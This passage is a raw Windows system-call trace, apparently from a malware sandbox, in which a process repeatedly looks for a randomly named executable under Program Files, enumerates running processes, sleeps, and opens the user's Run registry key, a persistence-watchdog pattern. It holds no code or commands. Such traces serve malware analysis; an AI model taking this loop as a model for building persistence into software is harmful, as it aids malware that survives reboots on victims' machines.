(HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.871] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.871] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.871] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0248.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0248.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0248.955] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0248.964] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0248.964] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0248.964] NtClose (Handle=0x14c) returned 0x0 [0248.964] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.964] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.964] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.964] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.964] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.965] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0248.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0249.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0249.075] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0249.089] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0249.089] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0249.089] NtClose (Handle=0x14c) returned 0x0 [0249.089] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.089] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.089] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.089] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.089] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.089] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0249.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0249.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0249.176] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0249.182] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0249.182] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0249.182] NtClose (Handle=0x14c) returned 0x0 [0249.183] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.183] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.183] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.183] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.183] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.183] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0249.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0249.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0249.265] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0249.276] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0249.276] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0249.276] NtClose (Handle=0x14c) returned 0x0 [0249.276] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.276] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.277] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.277] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.277] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.277] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0249.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0249.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0249.369] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0249.370] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0249.370] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0249.370] NtClose (Handle=0x14c) returned 0x0 [0249.370] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.370] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.370] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.371] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.371] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.371] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0249.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0249.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0249.462] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0249.464] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0249.466] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0249.466] NtClose (Handle=0x14c) returned 0x0 [0249.467] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.467] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.467] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.467] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.467] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.467] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0249.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0249.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0249.584] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0249.588] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0249.588] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0249.589] NtClose (Handle=0x14c) returned 0x0 [0249.589] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.589] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.589] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.589] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.589] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.589] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0249.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0249.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0249.691] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0249.697] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 